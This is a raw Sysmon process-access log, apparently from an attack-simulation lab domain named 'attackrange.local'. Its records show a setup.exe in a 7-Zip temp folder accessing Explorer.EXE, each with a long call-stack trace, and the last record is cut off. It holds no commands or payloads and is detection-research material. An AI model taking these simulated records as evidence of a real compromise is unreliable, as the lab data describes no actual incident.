13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000016037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000016029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000016024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\wind